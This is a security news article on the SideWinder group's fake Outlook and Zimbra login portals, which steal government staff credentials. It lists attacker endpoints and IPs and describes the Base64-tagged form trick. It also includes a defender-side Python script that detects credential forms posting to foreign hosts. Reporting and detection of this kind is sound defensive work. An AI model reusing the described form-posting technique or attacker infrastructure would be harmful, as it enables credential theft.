SideWinder Hacker Group Hosting Fake Outlook/Zimbra Portals to Steal Login Credentials


APT SideWinder, a state-sponsored threat actor long associated with espionage across South Asia, has recently launched a campaign deploying phishing portals that mimic legitimate Outlook and Zimbra webmail services.

Emerging in mid-2025, this operation uses free hosting platforms such as Netlify, pages.dev, and workers.dev to serve fake login pages tailored to government and military targets in Pakistan, Nepal, Sri Lanka, Bangladesh, and Myanmar.

By exploiting maritime and defense-themed lure documents, SideWinder not only harvests user credentials via direct POST requests but also stages malware in exposed directories for subsequent retrieval.

Beginning in August 2025, Hunt.io telemetry observed rapid domain churn—new phishing sites appeared every three to five days—underscoring a high operational tempo.

Many pages spoofed the Directorate General of Defense Purchases (DGDP) in Bangladesh, offering “Secured File” portals that prompted victims for email credentials under the guise of accessing Turkish defense equipment details.

Concurrently, Nepal’s Ministry of Finance staff received invitations to view PDF decoys titled “सम्माननीय प्रधानमन्त्रीज्यूको चीन भ्रमण सम्बन्धमा.pdf,” which redirected to a counterfeit Outlook login hosted on Netlify (98.84.224.111).


Fake Outlook webmail login page uncovered by Hunt.io, targeting Nepal’s Ministry of Finance and hosted on Netlify (Source – Hunt.io)

Hunt.io analysts noted the malware’s ability to blend social engineering with simple, effective credential collection.

In one SUPARCO-targeted site, JavaScript logic encodes the victim’s email in Base64 before redirecting to a secondary phishing page, then overlays a reload prompt to capture fresh inputs.

This staged redirection and obfuscation both tracks sessions and thwarts casual inspection.

JavaScript logic from the SUPARCO phishing kit showing Base64 encoding of the victim’s email and staged redirection (Source – Hunt.io)

The infection mechanism underpinning these fake portals relies on direct form submissions to attacker-controlled servers rather than client-side malware payloads.

A typical HTML form observed in the SUPARCO phishing kit posts captured credentials to the endpoint https://technologysupport.help/1pac.php.

The hidden inbox field carries a Base64-encoded address to correlate stolen credentials with specific campaigns.
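The form behaviour described above (a login form whose action points at a server other than the one serving the page, with a hidden Base64-encoded field that tags the victim) can be checked for mechanically. The following is an added defender-side example, not code from the article or from Hunt.io: it parses a saved HTML page, flags any form containing a password field that posts cross-origin, notes whether the page itself sits on one of the free hosting suffixes named in the article, and decodes hidden fields that are valid Base64. The page URL, HTML and hostnames in the sample are constructed for illustration; the endpoint and address are placeholders, not the campaign's own.

```python
import base64
import binascii
from html.parser import HTMLParser
from urllib.parse import urlparse, urljoin

# Free hosting suffixes named in the article (Netlify, pages.dev, workers.dev).
FREE_HOSTING_SUFFIXES = (".netlify.app", ".pages.dev", ".workers.dev")


class _FormCollector(HTMLParser):
    """Collects every <form> together with its action and the <input> tags inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(a)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def decode_b64(value):
    """Return the UTF-8 text behind a Base64 value, or None if it is not valid Base64/UTF-8."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def is_free_hosting(url):
    """True when the URL's host ends with one of the free hosting suffixes above."""
    host = (urlparse(url).hostname or "").lower()
    return host.endswith(FREE_HOSTING_SUFFIXES)


def analyse_page(page_url, html):
    """Flag credential forms that post off-origin and decode their hidden tracking fields."""
    parser = _FormCollector()
    parser.feed(html)
    page_host = (urlparse(page_url).hostname or "").lower()
    findings = []
    for form in parser.forms:
        # Only forms that collect a password are credential forms worth flagging.
        if not any((i.get("type") or "").lower() == "password" for i in form["inputs"]):
            continue
        action = urljoin(page_url, form["action"])  # resolve relative actions
        action_host = (urlparse(action).hostname or "").lower()
        hidden = {}
        for i in form["inputs"]:
            if (i.get("type") or "").lower() == "hidden" and i.get("name"):
                raw = i.get("value") or ""
                # Keep the decoded text when it is Base64, otherwise the raw value.
                hidden[i["name"]] = decode_b64(raw) or raw
        findings.append({
            "action": action,
            "cross_origin": action_host != page_host,
            "free_hosting": is_free_hosting(page_url),
            "hidden_fields": hidden,
        })
    return findings


# Constructed sample: a fake webmail login on a free hosting subdomain whose form
# posts to an unrelated collector host and carries a Base64-tagged hidden field.
SAMPLE_PAGE_URL = "https://secure-mail-portal.netlify.app/login.html"  # constructed
SAMPLE_HTML = """
<form method="post" action="https://collector.example.invalid/collect.php">
  <input type="hidden" name="inbox" value="dmljdGltQGV4YW1wbGUuZ292">
  <input type="text" name="login" placeholder="Email">
  <input type="password" name="passwd">
  <button type="submit">Sign in</button>
</form>
"""

if __name__ == "__main__":
    for finding in analyse_page(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(finding)
```

Run against a saved copy of a suspicious page, a finding with `cross_origin` set and a decoded e-mail address in `hidden_fields` is the signature the article describes; the `free_hosting` flag adds the hosting context so triage can prioritise portals on the platforms the campaign has favoured.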

Once harvested, these credentials feed into broader espionage workflows, granting SideWinder access to restricted networks or facilitating follow-on malware deployment from open directories at IPs such as 47.236.177.123 and 31.14.142.50.

By hosting portals on widely used, trusted platforms, SideWinder evades simple domain-based blocks and leverages rapid redeployment once URLs are taken down.

Countermeasures should include continuous monitoring of free hosting domains, advanced filtering of form POST requests to unknown servers, and user training to recognize document-based lures tied to login prompts. Combined with network segmentation and enforced multi-factor authentication, organizations can limit credential-based intrusions even when phishing attempts succeed.
